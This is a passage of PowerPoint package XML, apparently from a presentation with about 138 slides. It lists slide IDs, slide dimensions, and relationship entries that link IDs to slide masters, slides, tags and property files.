    <p:sldId id="382" r:id="rId173"/>
    <p:sldId id="383" r:id="rId174"/>
    <p:sldId id="384" r:id="rId175"/>
    <p:sldId id="385" r:id="rId176"/>
    <p:sldId id="386" r:id="rId177"/>
    <p:sldId id="387" r:id="rId178"/>
    <p:sldId id="388" r:id="rId179"/>
    <p:sldId id="389" r:id="rId180"/>
    <p:sldId id="390" r:id="rId181"/>
    <p:sldId id="391" r:id="rId182"/>
    <p:sldId id="392" r:id="rId183"/>
    <p:sldId id="393" r:id="rId184"/>
    <p:sldId id="394" r:id="rId185"/>
    <p:sldId id="395" r:id="rId186"/>
    <p:sldId id="396" r:id="rId187"/>
    <p:sldId id="397" r:id="rId188"/>
    <p:sldId id="398" r:id="rId189"/>
    <p:sldId id="399" r:id="rId190"/>
    <p:sldId id="400" r:id="rId191"/>
    <p:sldId id="401" r:id="rId192"/>
    <p:sldId id="402" r:id="rId193"/>
    <p:sldId id="403" r:id="rId194"/>
    <p:sldId id="404" r:id="rId195"/>
    <p:sldId id="405" r:id="rId196"/>
    <p:sldId id="406" r:id="rId197"/>
    <p:sldId id="407" r:id="rId198"/>
    <p:sldId id="408" r:id="rId199"/>
    <p:sldId id="409" r:id="rId200"/>
    <p:sldId id="410" r:id="rId201"/>
    <p:sldId id="411" r:id="rId202"/>
    <p:sldId id="412" r:id="rId203"/>
    <p:sldId id="413" r:id="rId204"/>
    <p:sldId id="414" r:id="rId205"/>
    <p:sldId id="415" r:id="rId206"/>
    <p:sldId id="416" r:id="rId207"/>
    <p:sldId id="417" r:id="rId208"/>
    <p:sldId id="418" r:id="rId209"/>
    <p:sldId id="419" r:id="rId210"/>
    <p:sldId id="420" r:id="rId211"/>
    <p:sldId id="421" r:id="rId212"/>
    <p:sldId id="422" r:id="rId213"/>
    <p:sldId id="423" r:id="rId214"/>
    <p:sldId id="424" r:id="rId215"/>
    <p:sldId id="425" r:id="rId216"/>
    <p:sldId id="426" r:id="rId217"/>
    <p:sldId id="427" r:id="rId218"/>
    <p:sldId id="428" r:id="rId219"/>
    <p:sldId id="429" r:id="rId220"/>
    <p:sldId id="430" r:id="rId221"/>
    <p:sldId id="431" r:id="rId222"/>
    <p:sldId id="432" r:id="rId223"/>
    <p:sldId id="433" r:id="rId224"/>
    <p:sldId id="434" r:id="rId225"/>
    <p:sldId id="435" r:id="rId226"/>
    <p:sldId id="436" r:id="rId227"/>
    <p:sldId id="437" r:id="rId228"/>
    <p:sldId id="438" r:id="rId229"/>
    <p:sldId id="439" r:id="rId230"/>
    <p:sldId id="440" r:id="rId231"/>
    <p:sldId id="441" r:id="rId232"/>
    <p:sldId id="442" r:id="rId233"/>
    <p:sldId id="443" r:id="rId234"/>
    <p:sldId id="444" r:id="rId235"/>
    <p:sldId id="445" r:id="rId236"/>
    <p:sldId id="446" r:id="rId237"/>
    <p:sldId id="447" r:id="rId238"/>
    <p:sldId id="448" r:id="rId239"/>
    <p:sldId id="449" r:id="rId240"/>
    <p:sldId id="450" r:id="rId241"/>
    <p:sldId id="451" r:id="rId242"/>
    <p:sldId id="452" r:id="rId243"/>
    <p:sldId id="453" r:id="rId244"/>
    <p:sldId id="454" r:id="rId245"/>
    <p:sldId id="455" r:id="rId246"/>
    <p:sldId id="456" r:id="rId247"/>
    <p:sldId id="457" r:id="rId248"/>
    <p:sldId id="458" r:id="rId249"/>
    <p:sldId id="459" r:id="rId250"/>
    <p:sldId id="460" r:id="rId251"/>
    <p:sldId id="461" r:id="rId252"/>
    <p:sldId id="462" r:id="rId253"/>
    <p:sldId id="463" r:id="rId254"/>
    <p:sldId id="464" r:id="rId255"/>
    <p:sldId id="465" r:id="rId256"/>
    <p:sldId id="466" r:id="rId257"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="7103745" cy="10234295"/>
  <p:custDataLst>
    <p:tags r:id="rId2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5" d="100"/>
          <a:sy n="115" d="100"/>
        </p:scale>
        <p:origin x="372" y="10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Master" Target="slideMasters/slideMaster98.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster97.xml"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster96.xml"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster95.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster94.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster93.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster92.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster91.xml"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster90.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster89.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster8.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster88.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster87.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster86.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster85.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster84.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster83.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster82.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster81.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster80.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster79.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster7.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster78.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster77.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster76.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster75.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster74.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster73.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster72.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster71.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster70.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster69.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster6.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster68.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster67.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster66.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster65.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster64.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster63.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster62.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster61.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster60.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster59.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster5.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster58.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster57.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster56.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster55.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster54.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster53.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster52.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster51.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster50.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster49.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster4.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster48.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster47.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster46.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster45.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster44.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster43.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster42.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster41.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster40.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster39.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster3.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster38.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster37.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster36.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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag250.xml"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster25.xml"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide138.xml"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide137.xml"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide136.xml"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide135.xml"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide134.xml"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide133.xml"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide132.xml"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide131.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster24.xml"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide130.xml"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide129.xml"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide128.xml"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide127.xml"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide126.xml"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide125.xml"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide124.xml"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide123.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide122.xml"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide121.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster23.xml"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide120.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide119.xml"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide118.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide117.xml"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide116.xml"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide115.xml"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide114.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide113.xml"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide112.xml"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide111.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster22.xml"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide110.xml"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide109.xml"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide108.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide107.xml"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide106.xml"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide105.xml"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide104.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide103.xml"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide102.xml"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide101.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster21.xml"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide100.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide99.xml"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide98.xml"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide97.xml"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide96.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide95.xml"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide94.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide93.xml"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide92.xml"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide91.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster20.xml"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide90.xml"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide89.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide88.xml"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide87.xml"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide86.xml"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide85.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide84.xml"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide83.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide82.xml"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide81.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster19.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide80.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide79.xml"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide78.xml"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide77.xml"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide76.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide75.xml"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide74.xml"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide73.xml"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide72.xml"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide71.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster18.xml"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide70.xml"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide69.xml"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide68.xml"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide67.xml"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide66.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide65.xml"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide64.xml"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide63.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide62.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide61.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster17.xml"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide60.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide59.xml"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide58.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide57.xml"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide56.xml"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide55.xml"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide54.xml"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide53.xml"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide52.xml"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide51.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster16.xml"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide50.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide49.xml"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide48.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide47.xml"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide46.xml"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide45.xml"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide44.xml"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide43.xml"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide42.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide41.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster15.xml"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide40.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide39.xml"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide38.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide37.xml"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide36.xml"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide35.xml"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide34.xml"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide33.xml"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide32.xml"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide31.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster14.xml"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide30.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide29.xml"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide28.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide27.xml"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide25.xml"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide24.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide23.xml"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide22.xml"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide21.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster13.xml"/><Relationship Id="rId139" 